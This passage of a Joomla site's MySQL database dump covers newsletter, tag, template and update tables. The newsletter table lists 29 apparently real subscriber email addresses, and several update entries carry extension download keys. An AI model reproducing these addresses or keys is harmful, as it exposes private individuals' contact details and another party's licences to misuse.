  `ordering` int(11) NOT NULL,
  `state` tinyint(1) NOT NULL,
  `created_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `confirm_mail` tinyint(1) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_sj_newsletter_email`
--

INSERT INTO `y57u5_sj_newsletter_email` (`id`, `email`, `checked_out`, `checked_out_time`, `ordering`, `state`, `created_date`, `confirm_mail`) VALUES
(1, 'banjiadewoye@gmail.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-21 10:01:56', 0),
(2, 'bankyfolarin@gmail.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-21 10:22:54', 0),
(3, 'akingbade.ope@gmail.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-21 10:56:22', 0),
(4, 'olasindetony@gmail.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-21 11:00:15', 0),
(5, 'tonyfav24@gmail.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-21 11:06:51', 0),
(6, 'christobile01@gmail.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-21 11:39:37', 0),
(7, 'dreya57@gmail.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-21 11:44:36', 0),
(8, 'akin_oladipo@yahoo.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-22 12:33:03', 0),
(9, 'adelekejoseph001@gmail.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-22 12:37:25', 0),
(10, 'dami.olotuah@gmail.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-22 12:38:54', 0),
(11, 'holutoye@gmail.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-22 12:42:37', 0),
(12, 'abiotemi@yahoo.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-22 12:47:31', 0),
(13, 'soundson@gmail.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-22 01:54:28', 0),
(14, 'olabisiojo@gmail.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-22 02:00:36', 0),
(15, 'oluwatosinoniya@yahoo.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-22 02:46:01', 0),
(16, 'jareogun@gmail.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-22 02:58:12', 0),
(17, 'oyeyemiaito@gmail.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-22 05:29:07', 0),
(18, 'oluwatoyeidowu@gmail.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-22 09:03:44', 0),
(19, 'ibukunolabiyi@hotmail.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-22 11:35:34', 0),
(20, 'ehiradavid@gmail.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-23 04:11:13', 0),
(21, 'sholzie@yahoo.co.uk', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-23 06:44:18', 0),
(22, 'labmuel@aol.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-23 08:43:21', 0),
(23, 'ajadiezekiel02@gmail.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-23 10:05:23', 0),
(24, 'kabelo.mogorosi.1975@gmail.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-23 10:29:49', 0),
(25, 'tolulopebalogun@gmail.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-24 12:36:07', 0),
(26, 'toba1abe@gmail.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-24 04:35:21', 0),
(27, 'ritaabiodun@gmail.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-24 07:41:47', 0),
(28, 'bis25mat@gmail.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-24 08:15:16', 0),
(29, 'oluabiola2@yahoo.com', 0, '0000-00-00 00:00:00', 0, 1, '2018-07-24 10:22:43', 0);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_sj_newsletter_email_content`
--

CREATE TABLE `y57u5_sj_newsletter_email_content` (
  `id` int(11) UNSIGNED NOT NULL,
  `title` varchar(255) NOT NULL,
  `email_send_from_name` varchar(255) NOT NULL,
  `email_customer_subject` varchar(255) NOT NULL,
  `email_customer_body` text NOT NULL,
  `ordering` int(11) NOT NULL,
  `state` tinyint(1) NOT NULL,
  `checked_out` int(11) NOT NULL,
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(11) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_sj_newsletter_email_content_id`
--

CREATE TABLE `y57u5_sj_newsletter_email_content_id` (
  `id` int(11) UNSIGNED NOT NULL,
  `id_content_mail` int(11) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_sj_newsletter_email_content_id`
--

INSERT INTO `y57u5_sj_newsletter_email_content_id` (`id`, `id_content_mail`) VALUES
(1, 0);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_tags`
--

CREATE TABLE `y57u5_tags` (
  `id` int(10) UNSIGNED NOT NULL,
  `parent_id` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `lft` int(11) NOT NULL DEFAULT '0',
  `rgt` int(11) NOT NULL DEFAULT '0',
  `level` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `path` varchar(400) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
  `note` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) UNSIGNED NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `access` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `params` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadesc` varchar(1024) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The meta description for the page.',
  `metakey` varchar(1024) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The meta keywords for the page.',
  `metadata` varchar(2048) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'JSON encoded metadata properties.',
  `created_user_id` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by_alias` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `modified_user_id` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `images` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `urls` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `hits` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL,
  `version` int(10) UNSIGNED NOT NULL DEFAULT '1',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `y57u5_tags`
--

INSERT INTO `y57u5_tags` (`id`, `parent_id`, `lft`, `rgt`, `level`, `path`, `title`, `alias`, `note`, `description`, `published`, `checked_out`, `checked_out_time`, `access`, `params`, `metadesc`, `metakey`, `metadata`, `created_user_id`, `created_time`, `created_by_alias`, `modified_user_id`, `modified_time`, `images`, `urls`, `hits`, `language`, `version`, `publish_up`, `publish_down`) VALUES
(1, 0, 0, 27, 0, '', 'ROOT', 'root', '', '', 1, 0, '0000-00-00 00:00:00', 1, '{}', '', '', '', 196, '2011-01-01 00:00:01', '', 0, '0000-00-00 00:00:00', '', '', 0, '*', 1, '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(2, 1, 1, 2, 1, 'widgetkit', 'Widgetkit', 'widgetkit', '', '', 1, 0, '0000-00-00 00:00:00', 1, '', '', '', '{\"author\":\"\",\"robots\":\"\",\"tags\":null}', 196, '2013-06-20 10:22:38', '', 0, '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '', 428, '*', 1, '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(3, 1, 3, 4, 1, 'slideshow', 'slideshow', 'slideshow', '', '', 1, 0, '0000-00-00 00:00:00', 1, '', '', '', '{\"author\":\"\",\"robots\":\"\",\"tags\":null}', 196, '2013-06-20 10:22:43', '', 0, '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '', 336, '*', 1, '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(4, 1, 5, 6, 1, 'spotlight', 'spotlight', 'spotlight', '', '', 1, 0, '0000-00-00 00:00:00', 1, '', '', '', '{\"author\":\"\",\"robots\":\"\",\"tags\":null}', 196, '2013-06-20 10:22:47', '', 0, '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '', 296, '*', 1, '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(5, 1, 7, 8, 1, 'lightbox', 'lightbox', 'lightbox', '', '', 1, 0, '0000-00-00 00:00:00', 1, '', '', '', '{\"author\":\"\",\"robots\":\"\",\"tags\":null}', 196, '2013-06-20 10:22:51', '', 0, '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '', 288, '*', 1, '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(6, 1, 9, 10, 1, 'warp', 'Warp', 'warp', '', '', 1, 0, '0000-00-00 00:00:00', 1, '', '', '', '', 196, '2014-07-26 07:06:26', '', 0, '0000-00-00 00:00:00', '', '', 282, '*', 1, '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(7, 1, 11, 12, 1, 'joomla', 'Joomla', 'joomla', '', '', 1, 0, '0000-00-00 00:00:00', 1, '', '', '', '', 196, '2014-07-26 07:06:26', '', 0, '0000-00-00 00:00:00', '', '', 396, '*', 1, '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(8, 1, 13, 14, 1, 'themeforest', 'Themeforest', 'themeforest', '', '', 1, 0, '0000-00-00 00:00:00', 1, '', '', '', '', 196, '2014-07-26 07:06:26', '', 0, '0000-00-00 00:00:00', '', '', 428, '*', 1, '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(9, 1, 15, 16, 1, 'wordpress', 'WordPress', 'wordpress', '', '', 1, 0, '0000-00-00 00:00:00', 1, '', '', '', '', 196, '2014-07-26 07:06:26', '', 0, '0000-00-00 00:00:00', '', '', 430, '*', 1, '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(10, 1, 17, 18, 1, 'arrowthemes', 'arrowthemes', 'arrowthemes', '', '', 1, 0, '0000-00-00 00:00:00', 1, '', '', '', '', 196, '2014-07-26 07:06:26', '', 0, '0000-00-00 00:00:00', '', '', 444, '*', 1, '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(11, 1, 19, 20, 1, 'cms', 'CMS', 'cms', '', '', 1, 0, '0000-00-00 00:00:00', 1, '', '', '', '', 196, '2014-07-26 07:07:25', '', 0, '0000-00-00 00:00:00', '', '', 391, '*', 1, '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(12, 1, 21, 22, 1, 'music', 'Music', 'music', '', '', 1, 0, '0000-00-00 00:00:00', 1, '', '', '', '', 196, '2014-07-26 07:08:14', '', 0, '0000-00-00 00:00:00', '', '', 284, '*', 1, '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(13, 1, 23, 24, 1, 'media', 'Media', 'media', '', '', 1, 0, '0000-00-00 00:00:00', 1, '', '', '', '', 196, '2014-07-26 07:08:14', '', 0, '0000-00-00 00:00:00', '', '', 461, '*', 1, '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(14, 1, 25, 26, 1, 'audiojungle', 'AudioJungle', 'audiojungle', '', '', 1, 0, '0000-00-00 00:00:00', 1, '', '', '', '', 196, '2014-07-26 07:09:17', '', 0, '0000-00-00 00:00:00', '', '', 297, '*', 1, '0000-00-00 00:00:00', '0000-00-00 00:00:00');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_template_styles`
--

CREATE TABLE `y57u5_template_styles` (
  `id` int(10) UNSIGNED NOT NULL,
  `template` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `client_id` tinyint(1) UNSIGNED NOT NULL DEFAULT '0',
  `home` char(7) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '0',
  `title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `params` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `y57u5_template_styles`
--

INSERT INTO `y57u5_template_styles` (`id`, `template`, `client_id`, `home`, `title`, `params`) VALUES
(23, 'protostar', 0, '0', 'protostar - Default', '{\"templateColor\":\"\",\"logoFile\":\"\",\"googleFont\":\"1\",\"googleFontName\":\"Open+Sans\",\"fluidContainer\":\"0\"}'),
(24, 'isis', 1, '1', 'isis - Default', '{\"templateColor\":\"\",\"logoFile\":\"\"}'),
(25, 'beez3', 0, '0', 'beez3 - Default', '{\"wrapperSmall\":53,\"wrapperLarge\":72,\"logo\":\"\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"navposition\":\"center\",\"bootstrap\":\"\",\"templatecolor\":\"nature\",\"headerImage\":\"\",\"backgroundcolor\":\"#eee\"}'),
(27, 'hathor', 1, '0', 'hathor - Default', '{\"showSiteName\":\"0\",\"logoFile\":\"\",\"colourChoice\":\"0\",\"boldText\":\"0\"}'),
(30, 'e4jboxoffice', 0, '0', 'E4J Box Office - Default', '{\"Header01\":\"Template Layout\",\"tcolour\":\"0\",\"getmenufixed\":\"0\",\"logolink\":\"\",\"headertxt\":\"24px\",\"bodytxt\":\"16px\",\"bfont\":\"latoregularbd\",\"hfont\":\"latoregular\",\"responsive\":\"0\",\"config\":\"\"}'),
(31, 'lighthouse_j3', 0, '1', 'lighthouse_j3 - Default', '{\"config\":\"\"}');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_ucm_base`
--

CREATE TABLE `y57u5_ucm_base` (
  `ucm_id` int(10) UNSIGNED NOT NULL,
  `ucm_item_id` int(10) NOT NULL,
  `ucm_type_id` int(11) NOT NULL,
  `ucm_language_id` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_ucm_content`
--

CREATE TABLE `y57u5_ucm_content` (
  `core_content_id` int(10) UNSIGNED NOT NULL,
  `core_type_alias` varchar(400) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'FK to the content types table',
  `core_title` varchar(400) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `core_alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
  `core_body` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `core_state` tinyint(1) NOT NULL DEFAULT '0',
  `core_checked_out_time` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '0000-00-00 00:00:00',
  `core_checked_out_user_id` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `core_access` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `core_params` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `core_featured` tinyint(4) UNSIGNED NOT NULL DEFAULT '0',
  `core_metadata` varchar(2048) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'JSON encoded metadata properties.',
  `core_created_user_id` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `core_created_by_alias` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `core_created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `core_modified_user_id` int(10) UNSIGNED NOT NULL DEFAULT '0' COMMENT 'Most recent user that modified',
  `core_modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `core_language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `core_publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `core_publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `core_content_item_id` int(10) UNSIGNED NOT NULL DEFAULT '0' COMMENT 'ID from the individual type table',
  `asset_id` int(10) UNSIGNED NOT NULL DEFAULT '0' COMMENT 'FK to the #__assets table.',
  `core_images` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `core_urls` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `core_hits` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `core_version` int(10) UNSIGNED NOT NULL DEFAULT '1',
  `core_ordering` int(11) NOT NULL DEFAULT '0',
  `core_metakey` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `core_metadesc` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `core_catid` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `core_xreference` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'A reference to enable linkages to external data sets.',
  `core_type_id` int(10) UNSIGNED NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Contains core content data in name spaced fields';

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_ucm_history`
--

CREATE TABLE `y57u5_ucm_history` (
  `version_id` int(10) UNSIGNED NOT NULL,
  `ucm_item_id` int(10) UNSIGNED NOT NULL,
  `ucm_type_id` int(10) UNSIGNED NOT NULL,
  `version_note` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'Optional version name',
  `save_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `editor_user_id` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `character_count` int(10) UNSIGNED NOT NULL DEFAULT '0' COMMENT 'Number of characters in this version.',
  `sha1_hash` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'SHA1 hash of the version_data column.',
  `version_data` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'json-encoded string of version data',
  `keep_forever` tinyint(4) NOT NULL DEFAULT '0' COMMENT '0=auto delete; 1=keep'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_updates`
--

CREATE TABLE `y57u5_updates` (
  `update_id` int(11) NOT NULL,
  `update_site_id` int(11) DEFAULT '0',
  `extension_id` int(11) DEFAULT '0',
  `name` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT '',
  `description` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `element` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT '',
  `type` varchar(20) COLLATE utf8mb4_unicode_ci DEFAULT '',
  `folder` varchar(20) COLLATE utf8mb4_unicode_ci DEFAULT '',
  `client_id` tinyint(3) DEFAULT '0',
  `version` varchar(32) COLLATE utf8mb4_unicode_ci DEFAULT '',
  `data` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `detailsurl` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `infourl` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `extra_query` varchar(1000) COLLATE utf8mb4_unicode_ci DEFAULT ''
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Available Updates';

--
-- Dumping data for table `y57u5_updates`
--

INSERT INTO `y57u5_updates` (`update_id`, `update_site_id`, `extension_id`, `name`, `description`, `element`, `type`, `folder`, `client_id`, `version`, `data`, `detailsurl`, `infourl`, `extra_query`) VALUES
(2, 13, 10470, 'Installer - Install from Web', 'This plugin offers functionality for the \'Install from Web\' tab.', 'webinstaller', 'plugin', 'installer', 0, '2.0.1', '', 'https://appscdn.joomla.org/webapps/jedapps/webinstaller.xml', 'http://docs.joomla.org/Install_from_Web', ''),
(3, 14, 10544, 'EngageBox', 'EngageBox', 'com_rstbox', 'component', '', 1, '3.5.0', '', 'https://static.tassos.gr/update/engagebox?type=.xml', 'https://www.tassos.gr/update/engagebox?view=Items&release_id=426', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(4, 17, 10557, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.2', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=451', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(5, 18, 10538, 'JCE 2.7.13', '', 'pkg_jce', 'package', '', 0, '2.7.13', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-13-released', ''),
(6, 19, 10275, 'JEvents', 'JEvents Package Update', 'pkg_jevents', 'package', '', 0, '3.4.50', '', 'https://www.jevents.net/updates/-bGlmZW9hc2lzaW50ZXJuYXRpb25hbGNodXJjaC5vcmc=/pkg_jevents-update-3.4.48.xml', 'https://www.jevents.net/product-page?item_id=857', ''),
(7, 3, 0, 'Armenian', '', 'pkg_hy-AM', 'package', '', 0, '3.4.4.1', '', 'https://update.joomla.org/language/details3/hy-AM_details.xml', '', ''),
(8, 3, 0, 'Malay', '', 'pkg_ms-MY', 'package', '', 0, '3.4.1.2', '', 'https://update.joomla.org/language/details3/ms-MY_details.xml', '', ''),
(9, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(10, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(11, 3, 0, 'Chinese Traditional', '', 'pkg_zh-TW', 'package', '', 0, '3.8.0.1', '', 'https://update.joomla.org/language/details3/zh-TW_details.xml', '', ''),
(12, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(13, 3, 0, 'Galician', '', 'pkg_gl-ES', 'package', '', 0, '3.3.1.2', '', 'https://update.joomla.org/language/details3/gl-ES_details.xml', '', ''),
(14, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(15, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(16, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(17, 3, 0, 'Hebrew', '', 'pkg_he-IL', 'package', '', 0, '3.1.1.2', '', 'https://update.joomla.org/language/details3/he-IL_details.xml', '', ''),
(18, 3, 0, 'Bengali', '', 'pkg_bn-BD', 'package', '', 0, '3.8.10.1', '', 'https://update.joomla.org/language/details3/bn-BD_details.xml', '', ''),
(19, 3, 0, 'Hungarian', '', 'pkg_hu-HU', 'package', '', 0, '3.9.5.1', '', 'https://update.joomla.org/language/details3/hu-HU_details.xml', '', ''),
(20, 3, 0, 'Afrikaans', '', 'pkg_af-ZA', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/af-ZA_details.xml', '', ''),
(21, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.5.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(22, 3, 0, 'Belarusian', '', 'pkg_be-BY', 'package', '', 0, '3.2.1.2', '', 'https://update.joomla.org/language/details3/be-BY_details.xml', '', ''),
(23, 3, 0, 'Bulgarian', '', 'pkg_bg-BG', 'package', '', 0, '3.6.5.2', '', 'https://update.joomla.org/language/details3/bg-BG_details.xml', '', ''),
(24, 3, 0, 'Catalan', '', 'pkg_ca-ES', 'package', '', 0, '3.8.11.1', '', 'https://update.joomla.org/language/details3/ca-ES_details.xml', '', ''),
(25, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(26, 3, 0, 'Croatian', '', 'pkg_hr-HR', 'package', '', 0, '3.8.5.1', '', 'https://update.joomla.org/language/details3/hr-HR_details.xml', '', ''),
(27, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(28, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(29, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(30, 3, 0, 'Esperanto', '', 'pkg_eo-XX', 'package', '', 0, '3.8.11.1', '', 'https://update.joomla.org/language/details3/eo-XX_details.xml', '', ''),
(31, 3, 0, 'Estonian', '', 'pkg_et-EE', 'package', '', 0, '3.8.10.1', '', 'https://update.joomla.org/language/details3/et-EE_details.xml', '', ''),
(32, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(33, 3, 0, 'Khmer', '', 'pkg_km-KH', 'package', '', 0, '3.4.5.1', '', 'https://update.joomla.org/language/details3/km-KH_details.xml', '', ''),
(34, 3, 0, 'Korean', '', 'pkg_ko-KR', 'package', '', 0, '3.8.9.1', '', 'https://update.joomla.org/language/details3/ko-KR_details.xml', '', ''),
(35, 3, 0, 'Latvian', '', 'pkg_lv-LV', 'package', '', 0, '3.7.3.1', '', 'https://update.joomla.org/language/details3/lv-LV_details.xml', '', ''),
(36, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.8.10.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(37, 3, 0, 'Macedonian', '', 'pkg_mk-MK', 'package', '', 0, '3.6.5.1', '', 'https://update.joomla.org/language/details3/mk-MK_details.xml', '', ''),
(38, 3, 0, 'Norwegian Bokmal', '', 'pkg_nb-NO', 'package', '', 0, '3.8.11.1', '', 'https://update.joomla.org/language/details3/nb-NO_details.xml', '', ''),
(39, 3, 0, 'Norwegian Nynorsk', '', 'pkg_nn-NO', 'package', '', 0, '3.4.2.1', '', 'https://update.joomla.org/language/details3/nn-NO_details.xml', '', ''),
(40, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(41, 3, 0, 'Polish', '', 'pkg_pl-PL', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/pl-PL_details.xml', '', ''),
(42, 3, 0, 'Portuguese', '', 'pkg_pt-PT', 'package', '', 0, '3.9.5.1', '', 'https://update.joomla.org/language/details3/pt-PT_details.xml', '', ''),
(43, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.6.2', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(44, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(45, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(46, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(47, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.6.2', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(48, 3, 0, 'Syriac', '', 'pkg_sy-IQ', 'package', '', 0, '3.4.5.1', '', 'https://update.joomla.org/language/details3/sy-IQ_details.xml', '', ''),
(49, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(50, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
